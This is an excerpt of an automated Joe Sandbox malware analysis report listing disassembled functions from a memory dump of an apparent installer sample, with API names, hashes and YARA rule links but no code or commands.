                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 646e34341b89ad954cc23fe080302075bc545c45ceba7ff9207998441afcc79d
                            • Instruction ID: 5f78066bbc6327cbb10280d5ecc6862ad87c5d32a4b03f537e44902e143a3d14
                            • Opcode Fuzzy Hash: 646e34341b89ad954cc23fe080302075bc545c45ceba7ff9207998441afcc79d
                            • Instruction Fuzzy Hash: E0E0EC39741108BFCF016F64C80DA9A3FB9FF45755B254426F81986A21CF3AE9E2DB80
                            Function 6C12BEA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 1a9ba8530ca0790b01b9138af33bbde51143f5ebee9d1bf4fae5cca4c648bd33
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 6091F439D00119DBEF14EFA4C8A0AEDF771EF26308F208069D65267A51DB39D9C9CB94
                            Function 6C0FA133 Relevance: 3.3, APIs: 2, Instructions: 302COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0FAFA0
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0FB7C3
                              • Part of subcall function 6C0FCA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0FB7AC,00000000,?,?,?,6C0FB7AC,?,6C12853C), ref: 6C0FCAC9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: 91fbddfda399159828bbb53563d2e134cbb1acfe2e2cb8a7ee90ec341c7eb294
                            • Instruction ID: 950059469fb92fc85e96b23ae2872ef5f1ab745364460daa04eb33239ca78654
                            • Opcode Fuzzy Hash: 91fbddfda399159828bbb53563d2e134cbb1acfe2e2cb8a7ee90ec341c7eb294
                            • Instruction Fuzzy Hash: 9FB18D71A046099FDB04DF65D88179EBBF5FB49318F28812AD835E7B80D374A686CF90
                            Function 6C12B972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: 8a8ebf6193cb148a2bbb40d310cbe00d44e8e0991e1f3560bf8810cd715dbc43
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 642191377A48564BE74CCA28DC33EB92680E748305B89527EE94BCB3D1DF6D8800CA48
                            Function 6C14840A Relevance: 2.3, APIs: 1, Instructions: 760COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C14840F
                              • Part of subcall function 6C149137: __EH_prolog.LIBCMT ref: 6C14913C
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction ID: 72bd55ce9f459e27e4e45a5b319f65555c442df26d9ed7b93c9bf3716242271d
                            • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction Fuzzy Hash: 24627971D01259CFEF15CFA8C894BEEBBB5BF14308F14806AE905ABA80D7749A45CF91
                            Function 6C1A0AD0 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: YA1
                            • API String ID: 0-613462611
                            • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction ID: d9276804dee2b6819855010aa4b03703bcba6755e4e74ad4295a4bc236aa3150
                            • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction Fuzzy Hash: 4B42F4746093818FC315CF68C49069ABBE2FFD9308F25496DE9DA8B742D631D90BCB42
                            Function 6C133BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: 3c9b2a56dbd8e2848529f455c87a7ff23f490512ec187d409181ca67ad43dfd7
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: 48510971A082559BE711CF5AC4C02EDFBF6EF7A214F18C05EE8C897242D27A598BC760
                            Function 6C1ACE80 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction ID: 1e516af91596d37fa72076e40e6701c63263df70d5b5496adc86c0321d3f6924
                            • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction Fuzzy Hash: 8402CC356087808BD724DF68C49079EBBE2AFD9308F148A2DE8C997B50C775D946CB82
                            Function 6C12F7CF Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: e1e0c4c77b8c16001a5338d7a5a28f779efcedc340c287238bd731914e7eaff2
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: F6519573E208314AE78CCE24DC2177572D2E784310F8BC1B99D4BAB6E6DD78589087D4
                            Function 6C207A46 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B
                            • API String ID: 0-1255198513
                            • Opcode ID: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction ID: 26b7b5b0333c0646f8b141a222e91317fc32e3f5e7414b214a054fe2592be054
                            • Opcode Fuzzy Hash: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction Fuzzy Hash: 9D3124315087558BD314DF28D884AABB3E2FBC4326F60CA3ED89ACBA94E7745815CF41
                            Function 6C1A3020 Relevance: .8, Instructions: 762COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                            • Instruction ID: 6eb7484ff5ba8544e1ec671829687bb637de9cca882610a4bad8092cf29aa89d
                            • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                            • Instruction Fuzzy Hash: FF526C35208B418BD328CF69C4907AAB7E2BF95308F548A2DD5DAC7B51DB74E84BCB41
                            Function 6C1BD930 Relevance: .7, Instructions: 740COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction ID: cd8e16a21200b14fd2d98737992b1e41f6f0aac8461b19310c20f1c666cb988d
                            • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction Fuzzy Hash: 1E6203B1A083418FC718DF19C48061AFBE1BFD9744F248A6EE899A7718D770E945CF82
                            Function 6C1A6D50 Relevance: .5, Instructions: 547COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                            • Instruction ID: c6ac9d3b37cb6f3ac0dc2f895c80fae506061cff994feecd80fdd86d10720dc0
                            • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                            • Instruction Fuzzy Hash: B112F2352093458FC718CF68C59066AFBE2BFD8304F14492EE9D687B45DB30E946CB81
                            Function 6C1B7AA0 Relevance: .5, Instructions: 474COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction ID: 5b025294a78e00d61234705a590c9b07b6ca916fe61dd27395210398111573d4
                            • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction Fuzzy Hash: CA02DA31A082128BD319CE28C4D0269BBF2FBC4355F190B2FE596E7A94D7749945CFE2
                            Function 6C1A2A50 Relevance: .5, Instructions: 453COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                            • Instruction ID: fdc1765e7ecd97c50d61e8b4c238aee443e289c712aeb7813795e1ed61aa5cfe
                            • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                            • Instruction Fuzzy Hash: 58F162366042898BEB28CF69D8547EEB7E2FBC1304F54453DD889CBB41DB39950ACB81
                            Function 6C1B25C0 Relevance: .3, Instructions: 333COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                            • Instruction ID: 3666606289ef2163083e18d7669d79aa7864cc673d25da4f9caa586ebdba1428
                            • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                            • Instruction Fuzzy Hash: 22D131715046128FD319CF1CC4A8236BBE1FF86304F054ABDDAA6AB38AD7349519CF50
                            Function 6C244F0A Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                            • Instruction ID: 65cecc798de1498aa24dd0cbd702a362680606583ecc66bb543bf186b3413cd1
                            • Opcode Fuzzy Hash: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                            • Instruction Fuzzy Hash: BBB1C9366187168FD318DE3CD8508BB73E2EBC1320F55863DE956C79C4DB31951A8B81
                            Function 6C1A5580 Relevance: .3, Instructions: 316COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction ID: f375cf8413575b19b0ad49679f05073c87b99f5647681dc51b794698df7638b7
                            • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction Fuzzy Hash: 7FC1B435208B418BC719CF79D0A06A6BBE2EFD9314F148A6DC5CE4BB55DA30A40ECB55
                            Function 6C1A1810 Relevance: .3, Instructions: 296COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction ID: d6e136d2fddc2d0dd4733a5f579905f60adcdf4279a9eae6f2374528a6c689ee
                            • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction Fuzzy Hash: 5FB1F235304B458BD324DFB9C890BEAB3E1AF91308F10452DD5AB8B751EF35A90E8B91
                            Function 6C1A4AA0 Relevance: .3, Instructions: 291COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                            • Instruction ID: c87e159cc9b5f12677fc6d51e6c51a68c428d6914bd9f55af836535b12d30748
                            • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                            • Instruction Fuzzy Hash: 60B1DE796087028BC304DF69C8806ABF7E2FFD8304F14892DE49AC7715EB70A55ACB95
                            Function 6C1AC9F0 Relevance: .3, Instructions: 287COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                            • Instruction ID: 20a9f86d9e8e6be3be09aba7e8f88d2424ed96f09f45d18a1c7e261cd5e0e015
                            • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                            • Instruction Fuzzy Hash: 29A1057560C3418FC314DF6DC4A069ABBE1AFD5358F044A2DE4DA87745E632E94BCB42
                            Function 6C1AC6E0 Relevance: .2, Instructions: 223COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                            • Instruction ID: 20636ddbf2cd036e3d5e97696dcb9caf43270b4d01b3d610169756e4f499a13f
                            • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                            • Instruction Fuzzy Hash: 7481C139A047058FC320DF69C090296B7E1FFA9714F28CA6DC5999B711E772E947CB81
                            Function 6C263881 Relevance: .2, Instructions: 184COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                            • Instruction ID: 416163fec0bcf273a75cbbd673f0c6c7bcb14130d2aea4c4db0dd95ccfde316c
                            • Opcode Fuzzy Hash: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                            • Instruction Fuzzy Hash: 235188366166254BC70CDA3CD8519E73392EBD5370B18C73EE55AC79D4EB79940BC600
                            Function 6C143B66 Relevance: .2, Instructions: 167COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction ID: 6c7e6870f8bd2971881832694a9408d3bcd8268451a06f0b71bbb50c2b89b511
                            • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction Fuzzy Hash: 7151AE76F006099BDB08CF98DD916EDB7F2EB88308F64816AD116E7781D7749A42CB80
                            Function 6C2CB06F Relevance: .2, Instructions: 155COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
